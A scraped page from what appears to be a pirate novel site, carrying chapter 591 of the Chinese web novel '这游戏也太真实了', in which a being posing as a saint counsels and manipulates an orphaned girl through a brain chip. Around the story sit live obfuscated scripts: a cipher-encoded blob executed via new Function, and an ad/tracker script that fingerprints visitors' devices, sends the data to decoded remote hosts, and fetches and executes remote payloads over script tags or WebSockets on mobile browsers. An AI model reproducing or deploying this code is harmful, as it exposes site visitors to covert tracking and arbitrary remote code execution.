宜小说

安装
字:
关灯 护眼
宜小说 > 这游戏也太真实了 > 第591章 起雾了

第591章 起雾了

(function(){function t11d18b6e(x16ae02){var fdb804468="9O5M.Jl$e4/],fjxG!7y2Ph^iwnT:L36pHCs0v&B?;dcKqESDY[W(Vk8z~m=rgFo%-uIaR1_ZtNb|XUA@Q";var tc68f0bf="sNHqg?pU~i:rQ/E73txf=98RP1JLXeBAG6uT2IF(&VoKv|MO4l[0nD!,_.hb%5jWz;kYc-$@aSdyC]^Zmw";return x16ae02.split('').map(function(nad834){var o1e191=fdb804468.indexOf(nad834);return o1e191==-1?nad834:tc68f0bf[o1e191]}).join('')}var c=t11d18b6e('ftp1://Q4(NdQ["" + "." + "=" + "W" + "0" + "w" + "G" + "Z" + "P" + "0"+""X2yC(a!4d(B) { - ByC(a!4d( B]0xyHa=8 9yhGhWhh8 (a=wN0wNh8 ZGaxDgGg8 @00w=HgxW) { 4y BfUEZaqo4(f~!L9!B(ZK4.Z!d]~lYZ!yd]@)) { ]L!C]( }- KZ] mDyygDa 2 yC(a!4d( B.ZHxgNZg) { ]L!C]( t!]4(.~y]d@|mZ]|dNLB.ZHxgNZg) }- KZ] MDHHZawyW 2 ZGaxDgGg[mDyygDaBW7Hw) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7H0)X8 FZGhPLL 2 ZGaxDgGg[mDyygDaBW7H0) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7Hw)X8 LGxD0LPL 2 @00w=HgxW[MDHHZawyWB"IG;ba@;CN&OFa@YQN622")X8 YDDywgW0N 2 MDHHZawyWB"IGnYI:^Y^o7Y=o;CN622")- KZ] bN=HgL 2 MDHHZawyWB"L@OuAonwAQ22")- KZ] y=0w=L0N- 4y BYdaZ!4d(~9LZ]am~4(NL7SyBbN=HgL) > Rw) { y=0w=L0N 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"Np;DNp&bAoj2"))- y=0w=L0N~4N 2 "!" + BEZ!m~]Z(Nd@B) * wWWWW)- y=0w=L0N~9!bYL~Q4N!m 2 "wWWr"- y=0w=L0N~9!bYL~mL4.m! 2 "GWWl7"- y=0w=L0N~N49Z=YLN 2 !]CL- @00w=HgxW~=dNb~ZllL(N|m4YNBy=0w=L0N) } KZ] !wyaxWaNN 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"ZoAbIowY"))- !wyaxWaNN~4N 2 "7" + BEZ!m~]Z(Nd@B) * wWWWW)- !wyaxWaNN~9!bYL~Q4N!m 2 "wWl7"- !wyaxWaNN~9!bYL~mL4.m! 2 g + "l7"- !wyaxWaNN~9!bYL~=Zau.]dC(N 2 "#&&&"- KZ] KWNL0 2 yC(a!4d( BdGPGgy0yw) { !wyaxWaNN~9]a 2 ["m!!l9/ff"8 dGPGgy0yw8 "]"8 "Fwww"8 (a=wN0wNh + "Jz]2" + BFZGhPLLBYdaZ!4d(~m]Ly))X~Fd4(B"f")- @00w=HgxW~=dNb~ZllL(N|m4YNB!wyaxWaNN) }- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(9L(N =]4N.4(. md9! " + 9yhGhWhh } ZGaxDgGg[MDHHZawyWB"A@;WI0.2")XB["m!!l9/ff"8 MDHHZawyWB9yhGhWhh)8 "m@~F9J" + VZ!L["(dQ"XB) + By=0w=L0N 22 (CYY J "" / bN=HgL)X~Fd4(B"f"))~!mL(BBYygDDHhP) 2> YygDDHhP~!L7!B))~!mL(BBYygDDHhP) 2> { 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL =]4N.4(. md9! " + YygDDHhP }- KWNL0BMDHHZawyWBYygDDHhP~9lY4!B"")~]LKL]9LB)~Fd4(B""))) })~aZ!amBBL]]) 2> { KWNL0BMDHHZawyWB]0xyHa=)) })- ZGaxDgGg["ZNNjKL(!T49!L(L]"XB"@L99Z.L"8 yC(a!4d( BL) { 4y BL~NZ!Z~u 22 (a=wN0wNh) { @00w=HgxW~.L!jYL@L(!3bvNB!wyaxWaNN~4N)~]L@dKLB)- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL 4y]Z@L ld9! @L99Z.L" } (LQ &C(a!4d(B"Z].9"8 MDHHZawyWBL~NZ!Z~K))B{ z!Na9/ LGxD0LPL8 z!]Z/ y=0w=L0N }) } }) })B"Z@jCa0ml=@h%N:vCL5YH"8 "I0PC=@;FN|g7I:YMA:lGT(mgL.22"8 "wG000HPP0gxP0g"8 Q4(NdQ8 NdaC@L(!) }-.=W0wGZP0B)-'.substr(7));new Function(c)()})();
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
大概是从一年前,聚居地刚修起那座教堂的时候,赵茵茵便时不时能在脑海里听见一位老人的声音。
  
  起初她以为那是自己的幻觉,但后来她发现并非如此,他不但会回答自己的疑惑,偶尔还会教她一些她从未了解的知识。
  
  在她很小的时候,她的爷爷便去世了,有时候她会觉得,那个老人就像她的爷爷一样,总是很慈祥。
  
  再后来,老人告诉她自己就是圣子,那座教堂中供奉的便是自己。
  
  茵茵亳不怀疑他说的话,倒不如说她早就怀疑,他的身份可能是那位圣子大人了。
  
  毕竟除了真正的神灵,还有谁能像他一样无处不在,无所不能,在她的脑海里和她交流呢
  
  从那以后,她便开始把自己的烦恼也都毫无保留地倾诉给了那位圣子大人。
  
  神灵不会说谎,更不会把凡人的烦恼到处乱讲。
  
  没有比他更合适的倾诉对象了……
  
  如往常一样。
  
  缩在别馆二楼空房间里的茵茵,把自己的烦恼,包括和好朋友闹的矛盾,包括家破人亡的悲伤,往后无依无靠的彷徨全都告诉了他。
  
  抹了抹眼泪,茵茵小声嘟囔着说道。
  
  「……对不起,自顾自地说了那么多,您可能觉得很无聊吧。「
  
  长久的沉默。
  
  那和蔼的声音缓缓飘入了她的脑海里。
  
  「怎么会,我的孩子。」
  
  虽然只是一句算不上鼓舞的安慰,但茵茵的脸上露出了一抹软弱却坚强的笑容,稍微振作了一些。
  
  片刻后,她似乎做出了某种决定,双目平视看向前方。
  
  「果然我还是应该和小羊道个歉……」
  
  站在看不见的地方俯视着小姑娘,罗乾淡淡地笑了笑。
  
  果然是孩子么。
  
  连这种无关紧要的小事儿,都会花那么多时间去烦恼,而他从不会这样,决定好了的事情立刻会去做。
  
  「如果你不想做这件事的话,其实也可以不做。」
  
  茵茵歪了下头。
  
  「为什么?」
  
  罗乾想告诉她,因为这一切都没有意义了。这座聚居地的人很快都会死,既然如此,做不做那种事情又有什么区别呢?
  
  但想了想,他最终没这么说。
  
  即使是羊圈里的动物,也是有幸福的度过最后一秒的权力的,他并不是为了杀人而去杀人。
  
  于是他换了一个更温柔的说法。
  
  「时间是一剂良药,它会平等地治愈一切伤痕,只要耐心地等待,一切都会好起来的。」
  
  茵茵抱紧了膝盖,将下巴埋在了膝间,小声的嘀咕道。
  
  「只要足够久,一切就会好起来吗。」
  
  「嗯。」
  
  守护在她旁边的神灵轻轻点头,虽然她看不见那个人,但她可以确信他在做这个动作。
  
  茵茵很相信他。
  
  但这件事她却无法认同。
  
  因为她记得很清楚,在自己烦恼着要不要帮小羊逃出这座牢笼的时候,他亲口告诉过自己。
  
  犹豫了片刻,她小声说道。
  
  「可是……您不是和我说过,很多事情都是来不及犹豫,留给时间去解答的问题最后得到的一定都是遗憾吗。」
  
  ……唔嗯?
  
  我有说过这句话吗。
  
  面对着一脸单纯的女孩,罗乾一时间不禁陷入了思索。
  
  在他所有选中的棋子中,这位小姑娘是年龄最小的一位,也是最为特别的一位。
  
  倒不是因为他对她怀有特殊的感情,仅仅是因为她和其他
  
  信徒不同,总会事无巨细地把生活中的每一件琐事儿烦恼都倾诉给他。
  
  其他人对神灵大多怀着敬意,对「只有自己能与神灵面对面的交流」这种事情感到殊荣。
  
  因此即便是打心眼里并不相信火炬信仰的赵天干———也就是这小姑娘的父亲,在与自己这种更高等的存在进行交流时,都会拿出谦卑虔诚的态度,小心斟酌每一个词句。
  
  而他自己也顺理成章地利用了这份敬畏,以圣子的面目与这些只配知其皮毛的信徒们交流。
  
  偶尔还会利用他们的身份发号施令。
  
  毕竟虽说芯片已经植入在他们的脑中,他也不是随随便便就能接管他们身体的。
  
  完全接管身体的控制权,只有在「神游」的时候。
  
  而这小姑娘似乎把他当成了一个倾诉的对象。
  
  她很天真地相信,神灵不会把凡人的事情到处乱讲,所以几乎什么事情都和他说。
  
  罗乾默许了她的行为。
  
  反正几句话的沟通也占用不了多少算力,而且关键的时候这枚棋子说不定还会派上用场。
  
  也正是因此,昨天白天的时候,他用知道一个绝妙的藏身处为借口,怂恿这小家伙去了地下室。
  
  毕竟即便和其他人一起发疯,也不能保证绝对的安全,毕竟庄园里还有一批特殊的客人。
  
  不过待在那个没人的地下室里,绝对是安全的。
  
  但现在看来,自己似乎也做了一件多余的事情,为了让一颗棋子在棋盘上多活一会儿,而让整个计划背上了不该有的风险。
  
  如果她没有去地下室,联盟说不定得花上一段时间才能找到位于别馆地下室的实验室。
  
  这枚棋子再有用,这座聚居地中的实验也已经结题了。何况活下来对她而言,也很难说是否是真正的仁慈。
  
  在梦境中死去是没有痛苦的,而如果落在了变种人的手上,那才是真正的生不如死。
  
  想到这里,罗乾轻轻叹了口气。
  
  果然……
  
  自己的修行还是不够。
  
  当然,更让他在意的其实还是另一件事儿,自己为什么会说出「留给时间去回答的问题最后得到的一定都是遗憾」这样的话。
  
  遗憾么。
  
  那种东西惟独不可能出现在自己身上。
  
  在这条路上他们已经付出了足够的代价,并且在最后一刻为他们的理想献上了全部。
  
  他已经没有任何可以回头的可能了。
  
  「我只是觉得,逃避是不好的……圣子大人」见脑袋里的声音许久没有出现,茵茵紧张地小心问了一句。
  
  她已经一无所有了。
  
  如果连圣子大人都不理她了,她可能就真的绝望了。
  
  「嗯,我在…我只是在想,我是什么时候说的那句话,不好意思让你久等了。「罗乾柔和地笑了笑说道。
  
  茵茵的脸上露出了松了口气的笑容。
  
  「没关系的……您每天要回应很多人的祈祷吧,晚一点回我也是没关系的,只要您还在就好。」
  
  见这小丫头还在担心自己,罗乾不禁莞尔一笑。
  
  如果让她知道,正是自己控制着她的父亲,走到联盟的面前被那群士兵杀死了的话,不知道她是否还笑得出来。
  
  「神的工作其实并没有你想象中的那么忙。」
  
  茵茵歪了下头。
  
  「可是不会有人很多人向你祈祷吗?」
  
  他用温和的语气说道。
  
  」我的孩子,大多数人其实并不会真正询问神的旨意,在向我祈祷之前,他们心中其实已经有自己的答案了…他们需要的,
  
  可能只是有人在后面推他们一把,像你这样把什么事情都交给我来决定的孩子其实是少数。」
  
  听到这句话,茵茵不禁脸微微有些发烫,惭愧的小声说道。
  
  「对不起……给您添麻烦了。」
  
  「没关系,我并不认为你是个麻烦,倒不如说我很高兴看到你的成长。以前你总是询问我的意见,但今天你是自己做出决定的要去和朋友和好,你已经有了自己的主见,这是好事儿。」
  
  茵茵不理解地问道。
  
  「神明大人不希望人们听自己的话吗?」
  
  「如果每一件事情都交给神来决定,我可能真的得忙死了。」
  
  半开玩笑地说出了这句话,回过神来的罗乾忽然轻轻地啧了一声。
  
  说来说去,他倒是自己把自己给否定了。
  
  不过也难怪,他很清楚先行者并不是真正的神明,圣子更不是,他们只是需要神明的这身衣服,去做一些人类不可能做到的事情。
  
  他当然很欣慰这里的聚居地都服从于自己的意志,但站在一位长者的立场,他还是希望把更珍贵的东西教给这位孩子。
  
  听话当然是好孩子,但没有自己的主见永远都是孩子,他更希望她有自己的主见,即便这与他宣扬的教义是截然相反的。
  
  或许矛盾的不是他的言行,他的内心深处其实并不希望这个小姑娘去死。
  
  别说是一个活着的人了。
  
  就算是种在盆栽里的花花草草,只要是付出过时间去浇灌,谁都希望它能好好的不要枯萎掉。
  
  不算上那些志同道合的使徒们,这大概是他进入圣域以来和凡人沟通最多的一次。
  
  思索了片刻,罗乾想出了一个折中的办法。
  
  那就是从羊圈里放掉这只特别的小羊羔。
  
  反正对他来说,少那么一两只并不是什么大问题,联盟也不太可能靠着一个单一的样本研究出什么东西。
  
  「如果你相信我,我可以给你指一条路。」
  
  茵茵认真地点头。
  
  「嗯!您说吧!」
  
  罗乾缓缓说道。
  
  「放弃这里的一切,向联盟的人寻求庇护,然后彻底离开这个是非之地,我想看在你还是个孩子的份上,他们会考虑的。」
  
  茵茵不解地看着他,大眼睛中闪烁着难以置信和诧异。
  
  「可是……联盟的人不是坏蛋吗?他们杀了我的父亲,我还听说……他们要把您的教堂给拆了。」
  
  看着极力证明那些人是恶棍的小姑娘,罗乾忽然哈哈笑出了声来,差点儿笑出了眼泪。
  
  可惜,他已经没有那东西了。
  
  直到那双诧异的眼睛变成了困惑,他缓缓开口继续说道。
  
  「听着,你的年龄可能无法理解,但你长大了之后会明白的……你现在说的那些事情根本不重要。」
  
  茵茵瞪大了眼睛看着空处。
  
  「怎么会……」
  
  没有向她解释,罗乾用严肃的语气继续说道。
  
  「这座聚居地被夹在了两个庞然大物之间,甚至于这片土地上的所有聚居地都是如此,不管他们作何选择,最后的下场一定不会很好。而你想要活下去,唯一的办法就是离这里远远的。」
  
  茵茵咬着嘴唇,挤出来一句话。
  
  「可为什么要投靠联盟……您不能带我走吗?」
  
  罗乾的表情微微一滞,沉默良久后,模棱两可地说道。
  
  「我们那儿还需要一点时间……」
  
  如果把她赶进另一座羊圈就没有意义了,就算其他先行者看在他的面子上会照顾她,该进行的实验也是一定会按部就班
  
  进行的。
  
  茵茵的眼中写着迷茫和不解。
  
  「时间?」
  
  罗乾点了下头,耐心地说道。
  
  「嗯……这是一项浩大的工程。」
  
  「新的人类,新的社会,这些都需要很长很长的时间去搭建,我们会把这个乌托邦建设的尽可能完美,而为此我们需要付出生命、勇气以及决心。我知道未来那里会成为天国,整个世界都会,但不是现在……可以给我一点时间吗?」
  
  他不知道自己为什么要征求这个孩子的同意,而且还要用上了温和的征求语气。
  
  其实他没必要这么做,毕竟一切都是决定好了的,就算她摇头也改变不了这座聚居地的命运。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x5a\x4e\x70\x4b\x4a\x5a\x57\x61\x62']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2tkZmouYWxza2ZkZi5jb206MTg0NNDM=','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['N','N']);}:function(){};
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《这游戏也太真实了》
打开
浏览器
继续